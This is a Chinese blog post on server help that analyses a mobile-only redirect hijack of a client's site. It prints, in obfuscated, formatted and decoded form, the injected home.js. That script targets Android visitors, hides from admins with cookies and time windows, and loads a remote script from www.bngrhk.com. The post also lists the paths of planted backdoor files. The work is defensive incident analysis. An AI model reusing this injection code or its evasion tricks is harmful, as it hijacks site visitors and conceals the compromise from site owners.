最近流行的手机站区域性劫持的分析及处理!
分类
服务器帮助
阅读1228 次
发布日期 2018-11-01
本次接到的客户遇到的问题是:他的手机站总是被跳转到一个垃圾推广网站页面,电脑端访问则正常,他自己查了好久也没发现问题在哪儿,就请我来帮忙一起分析并处理一下.
首先我们先用谷歌浏览器模拟手机访问,同时利用抓包工具分析一下他的详细访问及源码,如下:
然后到服务器上检查站点目录内的 js 文件是否有最近被修改的痕迹,结果发现 home.js 最近被改动过,如下:
现在我们来解密一下这个home.js文件,还原下看看他的详细操作,如下:
【原加密代码】
// Obfuscated sample exactly as it was found in home.js: a sojson-style string table in which every member
// name, cookie key, time window and the injected <script> markup is hex-escaped, so grepping the file for
// "cookie", "write" or the remote host name finds nothing. Kept verbatim as the evidence stage; the same
// code is shown formatted and decoded further down. (The line breaks inside "var " / "|| " come from the
// paste, not the original file.)
var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var _0x709e=["\x67\x65\x74\x48\x6F\x75\x72\x73","\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x3A","\x73\x70\x6C\x69\x74","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73","\x68","\x64","\x28\x5E\x7C\x20\x29","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E","\x61\x6E\x64\x72\x6F\x69\x64","\x69\x6E\x64\x65\x78\x4F\x66","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x69\x50\x68\x6F\x6E\x65","\x69\x50\x61\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70","\x68\x36","\x30\x3A\x30\x30","\x38\x3A\x33\x30","\x31\x35\x3A\x30\x30","\x32\x33\x3A\x35\x39","\x61\x6A\x61\x78","\x3C\x73\x63\x72\x69\x70\x74","\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F","\x31\x2E\x6A\x73\x22\x3E\x3C","\x2F\x73\x63\x72\x69\x70","\x74\x3E","\x77\x72\x69\x74\x65","\x31","\x31\x3A\x33\x30","\x36\x3A\x35\x39","\x64\x32\x34"];function checkTime(_0xf217x2){var _0xf217x3= new Date();var _0xf217x4=parseInt(_0xf217x3[_0x709e[0]]())* 60+ parseInt(_0xf217x3[_0x709e[1]]());var _0xf217x5=_0xf217x2[0][_0x709e[3]](_0x709e[2]);var _0xf217x6=_0xf217x2[1][_0x709e[3]](_0x709e[2]);var 
_0xf217x7=parseInt(_0xf217x5[0])* 60+ parseInt(_0xf217x5[1]);var _0xf217x8=parseInt(_0xf217x6[0])* 60+ parseInt(_0xf217x6[1]);if(_0xf217x4>= _0xf217x7&& _0xf217x4<= _0xf217x8){return true}else {return false}}function randomNum(_0xf217xa,_0xf217xb){switch(arguments[_0x709e[5]]){case 1:return parseInt(Math[_0x709e[4]]()* _0xf217xa+ 1,10);break;case 2:return parseInt(Math[_0x709e[4]]()* (_0xf217xb- _0xf217xa+ 1)+ _0xf217xa,10);break;default:return 0;break}}function setCookie(_0xf217xd,_0xf217xe,_0xf217xf){var _0xf217x10=getsec(_0xf217xf);var _0xf217x11= new Date();_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]()+ _0xf217x10* 1);document[_0x709e[8]]= _0xf217xd+ _0x709e[9]+ escape(_0xf217xe)+ _0x709e[10]+ _0xf217x11[_0x709e[11]]()}function getsec(_0xf217x13){var _0xf217x14=_0xf217x13[_0x709e[12]](1,_0xf217x13[_0x709e[5]])* 1;var _0xf217x15=_0xf217x13[_0x709e[12]](0,1);if(_0xf217x15== _0x709e[13]){return _0xf217x14* 1000}else {if(_0xf217x15== _0x709e[14]){return _0xf217x14* 60* 60* 1000}else {if(_0xf217x15== _0x709e[15]){return _0xf217x14* 24* 60* 60* 1000}}}}function getCookie(_0xf217xd){var _0xf217x17,_0xf217x18= new RegExp(_0x709e[16]+ _0xf217xd+ _0x709e[17]);if(_0xf217x17= document[_0x709e[8]][_0x709e[18]](_0xf217x18)){return unescape(_0xf217x17[2])}else {return null}}var browser={versions:function(){var _0xf217x1a=navigator[_0x709e[19]],_0xf217x1b=navigator[_0x709e[20]];return {android:_0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21])> -1,iPhone:_0xf217x1a[_0x709e[22]](_0x709e[24])> -1,iPad:_0xf217x1a[_0x709e[22]](_0x709e[25])> -1}}()};var xxx=randomNum(1,2);var isadmin=(window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i)!= null;if(!isadmin){var isiPad=navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i)!= null;if(isiPad){if(getCookie(_0x709e[28])){var hanzhanwap=parseInt(getCookie(_0x709e[28]))+ 1;setCookie(_0x709e[28],hanzhanwap,_0x709e[29]);if(parseInt(getCookie(_0x709e[28]))<= 6){if(checkTime([_0x709e[30],_0x709e[31]])|| 
checkTime([_0x709e[32],_0x709e[33]])){if(xxx== 1){$[_0x709e[34]]= 1;document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}else {setCookie(_0x709e[28],_0x709e[41],_0x709e[29]);if(checkTime([_0x709e[42],_0x709e[43]])){if(xxx== 1){document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}}else {setCookie(_0x709e[28],888,_0x709e[44])}
【格式化后】
// Obfuscator watermark: the IIFE stores the sojson obfuscator URL into window._decode (the two hex
// strings decode to "_decode" and "http://www.sojson.com/javascriptobfuscator.html"). Harmless by itself,
// but a useful signature for spotting other files processed by the same tool.
var __encode = 'sojson.com',
_0xb483 = ["\x5F\x64\x65\x63\x6F\x64\x65", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];
(function(_0xd642x1) {
_0xd642x1[_0xb483[0]] = _0xb483[1]
})(window);
// String table. All property names (getHours, cookie, write, ...), the cookie name, the time windows and
// the five fragments of the injected <script src="//www.bngrhk.com/1.js"> tag live here as hex escapes and
// are reached only as _0x709e[i]; the decoded table is listed further down with one entry per index.
var _0x709e = ["\x67\x65\x74\x48\x6F\x75\x72\x73", "\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73", "\x3A", "\x73\x70\x6C\x69\x74", "\x72\x61\x6E\x64\x6F\x6D", "\x6C\x65\x6E\x67\x74\x68", "\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x73", "\x68", "\x64", "\x28\x5E\x7C\x20\x29", "\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29", "\x6D\x61\x74\x63\x68", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x6E\x64\x72\x6F\x69\x64", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x69\x50\x68\x6F\x6E\x65", "\x69\x50\x61\x64", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70", "\x68\x36", "\x30\x3A\x30\x30", "\x38\x3A\x33\x30", "\x31\x35\x3A\x30\x30", "\x32\x33\x3A\x35\x39", "\x61\x6A\x61\x78", "\x3C\x73\x63\x72\x69\x70\x74", "\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F", "\x31\x2E\x6A\x73\x22\x3E\x3C", "\x2F\x73\x63\x72\x69\x70", "\x74\x3E", "\x77\x72\x69\x74\x65", "\x31", "\x31\x3A\x33\x30", "\x36\x3A\x35\x39", "\x64\x32\x34"];
function checkTime(_0xf217x2) {
// True when the local wall-clock time lies inside the inclusive window given as ["H:MM", "H:MM"].
// _0x709e[0]/[1] are getHours/getMinutes, [3] is split and [2] the ":" separator.
var toMinutes = function(hhmm) {
var parts = hhmm[_0x709e[3]](_0x709e[2]);
return parseInt(parts[0]) * 60 + parseInt(parts[1]);
};
var now = new Date();
var nowMinutes = parseInt(now[_0x709e[0]]()) * 60 + parseInt(now[_0x709e[1]]());
var windowStart = toMinutes(_0xf217x2[0]);
var windowEnd = toMinutes(_0xf217x2[1]);
return nowMinutes >= windowStart && nowMinutes <= windowEnd;
}
function randomNum(_0xf217xa, _0xf217xb) {
// One argument: integer in [1, a]. Two arguments: integer in [a, b]. Any other arity: 0.
// _0x709e[5] is "length", _0x709e[4] is "random".
var argc = arguments[_0x709e[5]];
if (argc === 1) {
return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
}
if (argc === 2) {
return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
}
return 0;
}
function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
// Writes name=escape(value);expires=<now + getsec(ttl) ms>. No path/domain attribute is set.
// _0x709e[6]/[7] are getTime/setTime, [8] is "cookie", [9] "=", [10] ";expires=", [11] toGMTString.
var expires = new Date();
expires[_0x709e[7]](expires[_0x709e[6]]() + getsec(_0xf217xf) * 1);
var cookieText = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + expires[_0x709e[11]]();
document[_0x709e[8]] = cookieText;
}
function getsec(_0xf217x13) {
// Parses "<unit><count>" into milliseconds: unit "s" (_0x709e[13]), "h" ([14]) or "d" ([15]).
// Any other unit falls through and yields undefined. _0x709e[12] is substring, [5] is length.
var count = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
var unit = _0xf217x13[_0x709e[12]](0, 1);
if (unit == _0x709e[13]) {
return count * 1000;
}
if (unit == _0x709e[14]) {
return count * 60 * 60 * 1000;
}
if (unit == _0x709e[15]) {
return count * 24 * 60 * 60 * 1000;
}
return undefined;
}
function getCookie(_0xf217xd) {
// Reads one cookie by name out of document.cookie; returns its unescape()d value, or null when absent.
// _0x709e[16] + name + [17] builds /(^| )name=([^;]*)(;|$)/, [8] is "cookie", [18] is match.
var pattern = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
var found = document[_0x709e[8]][_0x709e[18]](pattern);
return found ? unescape(found[2]) : null;
}
// Dead code: `browser` (and the navigator.appVersion read into _0xf217x1b) is never used by the trigger
// logic below; it looks like leftover template code rather than part of the attack — inference.
var browser = {
versions: function() {
var _0xf217x1a = navigator[_0x709e[19]],
_0xf217x1b = navigator[_0x709e[20]];
return {
android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
}
}()
};
// 1 or 2: the payload fires on roughly half of the eligible page loads only, so a single manual
// reproduction attempt often shows nothing.
var xxx = randomNum(1, 2);
// _0x709e[27][26] = window.location.href: any URL containing "admin" (the site backend) is exempt.
var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
if (!isadmin) {
// _0x709e[19] = navigator.userAgent. Misnamed: it gates on Android/Linux agents, so desktop browsers
// and iOS devices never reach the injection — which is why the PC view looked clean.
var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
if (isiPad) {
// _0x709e[28] = per-browser counter cookie "hanzhanwap", [29] = "h6" (six-hour lifetime).
if (getCookie(_0x709e[28])) {
var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
// At most 6 injections per cookie lifetime, and only in [30]-[31] = 0:00-8:30 or [32]-[33] = 15:00-23:59
// local time of the visitor's device.
if (parseInt(getCookie(_0x709e[28])) <= 6) {
if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
if (xxx == 1) {
// [34] = "ajax": overwrites $.ajax with 1 (purpose unclear); throws, skipping the write below,
// when `$` is not defined on the page.
$[_0x709e[34]] = 1;
// [35]..[39] concatenate to <script language="javascript" type="text/javascript"
// src="//www.bngrhk.com/1.js"></script>; [40] = document.write. The remote 1.js is presumably
// what performs the redirect, so its behaviour can change without touching home.js.
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
} else {
// First visit: counter starts at [41] = "1" for six hours; injection only in [42]-[43] = 1:30-6:59 local time.
setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
if (checkTime([_0x709e[42], _0x709e[43]])) {
if (xxx == 1) {
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
}
} else {
// Backend visitor: counter forced to 888 for [44] = "d24" (24 days), so the "<= 6" gate above keeps
// the site operator's own browser clean long after leaving the admin area.
setCookie(_0x709e[28], 888, _0x709e[44])
}
【解密后代码】
// Obfuscator watermark: sets window._decode to the sojson obfuscator URL. Note that the hex string in the
// formatted listing above decodes to "http://", not "https://" as rendered here.
var __encode = 'sojson.com',
_0xb483 = ["_decode", "https://www.sojson.com/javascriptobfuscator.html"];
(function(_0xd642x1) {
_0xd642x1[_0xb483[0]] = _0xb483[1]
})(window);
// Decoded string table, indexed as _0x709e[i] by the code below:
//  0-1 getHours/getMinutes, 2 ":", 3 split, 4 random, 5 length, 6-7 getTime/setTime, 8 cookie,
//  9-11 "=", ";expires=", toGMTString, 12 substring, 13-15 the s/h/d time units, 16-17 the cookie regex
//  parts, 18 match, 19-20 userAgent/appVersion, 21-25 UA probes, 26-27 href/location,
//  28 cookie name "hanzhanwap", 29 "h6" (6 h), 30-33 and 42-43 time windows, 34 "ajax",
//  35-39 the fragments of <script ... src="//www.bngrhk.com/1.js"></script>, 40 write, 41 "1", 44 "d24" (24 d).
// This is a rendered view: entry 36 contains unescaped double quotes and is not valid JS as printed.
var _0x709e = ["getHours", "getMinutes", ":", "split", "random", "length", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "substring", "s", "h", "d", "(^| )", "=([^;]*)(;|$)", "match", "userAgent", "appVersion", "android", "indexOf", "toLowerCase", "iPhone", "iPad", "href", "location", "hanzhanwap", "h6", "0:00", "8:30", "15:00", "23:59", "ajax", "<script", " language="javascript" type="text/javascript" src="//www.bngrhk.com/", "1.js"><", "/scrip", "t>", "write", "1", "1:30", "6:59", "d24"];
function checkTime(_0xf217x2) {
// True when the local wall-clock time lies inside the inclusive window given as ["H:MM", "H:MM"].
// Same logic as the obfuscated form, with the string-table lookups replaced by the names they resolve to.
var toMinutes = function(hhmm) {
var parts = hhmm.split(":");
return parseInt(parts[0]) * 60 + parseInt(parts[1]);
};
var now = new Date();
var nowMinutes = parseInt(now.getHours()) * 60 + parseInt(now.getMinutes());
var windowStart = toMinutes(_0xf217x2[0]);
var windowEnd = toMinutes(_0xf217x2[1]);
return nowMinutes >= windowStart && nowMinutes <= windowEnd;
}
function randomNum(_0xf217xa, _0xf217xb) {
// One argument: integer in [1, a]. Two arguments: integer in [a, b]. Any other arity: 0.
// The main body calls randomNum(1, 2) and treats the result 1 as "fire", i.e. a coin flip.
var argc = arguments.length;
if (argc === 1) {
return parseInt(Math.random() * _0xf217xa + 1, 10);
}
if (argc === 2) {
return parseInt(Math.random() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
}
return 0;
}
function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
// Writes name=escape(value);expires=<now + getsec(ttl) ms>. No path/domain attribute is set, so the
// cookie is scoped to the path of the page that ran this script.
var ttlMs = getsec(_0xf217xf);
var expires = new Date();
expires.setTime(expires.getTime() + ttlMs * 1);
document.cookie = _0xf217xd + "=" + escape(_0xf217xe) + ";expires=" + expires.toGMTString();
}
function getsec(_0xf217x13) {
// Parses "<unit><count>" into milliseconds: "s5" -> 5 s, "h6" -> 6 h, "d24" -> 24 d.
// Any other unit falls through and yields undefined (setCookie then produces an invalid expiry date).
var count = _0xf217x13.substring(1, _0xf217x13.length) * 1;
var unit = _0xf217x13.substring(0, 1);
if (unit == "s") {
return count * 1000;
}
if (unit == "h") {
return count * 60 * 60 * 1000;
}
if (unit == "d") {
return count * 24 * 60 * 60 * 1000;
}
return undefined;
}
function getCookie(_0xf217xd) {
// Reads one cookie by name out of document.cookie via /(^| )name=([^;]*)(;|$)/; returns the
// unescape()d value, or null when the cookie is absent.
var pattern = new RegExp("(^| )" + _0xf217xd + "=([^;]*)(;|$)");
var found = document.cookie.match(pattern);
return found ? unescape(found[2]) : null;
}
// Dead code: `browser` (and the navigator.appVersion read into _0xf217x1b) is never used by the trigger
// logic below; it looks like leftover template code rather than part of the attack — inference.
var browser = {
versions: function() {
var _0xf217x1a = navigator[_0x709e[19]],
_0xf217x1b = navigator[_0x709e[20]];
return {
android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
}
}()
};
// Coin flip (1 or 2): the payload fires on roughly half of the eligible page loads, so a single manual
// reproduction attempt often shows nothing. Detection should rely on the file diff, not on reproducing it.
var xxx = randomNum(1, 2);
// window.location.href matched against /admin/i: anyone browsing the site backend is exempt.
var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
if (!isadmin) {
// navigator.userAgent gate. Misnamed: it selects Android/Linux agents, so desktop browsers and iOS
// devices never reach the injection — which is why the PC view looked clean.
var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
if (isiPad) {
// Returning visitor: bump the per-browser counter cookie "hanzhanwap" (six-hour lifetime, "h6") ...
if (getCookie(_0x709e[28])) {
var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
// ... and inject at most 6 times per cookie lifetime, only between 0:00-8:30 or 15:00-23:59 local
// time of the visitor's device.
if (parseInt(getCookie(_0x709e[28])) <= 6) {
if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
if (xxx == 1) {
// Overwrites $.ajax with 1 (purpose unclear); throws, skipping the write below, when `$` is
// not defined on the page.
$[_0x709e[34]] = 1;
// document.write('<script language="javascript" type="text/javascript"
// src="//www.bngrhk.com/1.js"></script>'). The remote 1.js is presumably what performs the
// redirect, so its behaviour can change without touching home.js; block the host and check
// access logs for requests to it.
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
} else {
// First visit: counter starts at "1" for six hours; injection only between 1:30 and 6:59 local time.
setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
if (checkTime([_0x709e[42], _0x709e[43]])) {
if (xxx == 1) {
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
}
} else {
// Backend visitor: counter forced to 888 for "d24" (24 days), so the "<= 6" gate above keeps the
// site operator's own browser clean long after leaving the admin area.
setCookie(_0x709e[28], 888, _0x709e[44])
}
看来这位黑客藏得还不够深,一下就被我找到了,哈哈。于是我们又全面检查了一下网站文件和相关日志,终于找到了原因:网站内被放置了几个后门木马,路径如下:
\home\wwwroot\m.*.net\Lib232\Home\Common\config.php
\home\wwwroot\www.*.net\Libbeifen\ThinkPHP\Library\Vendor\Boris\config(1).php
\home\wwwroot\www.*.net\Lib232323\ThinkPHP\Mode\Api\ray.php
好了,现在我们再一次抓到了这个小黑客并给客户做好了驱动级防御成功交差,现在可以继续进行下一位客户问题的分析和处理了!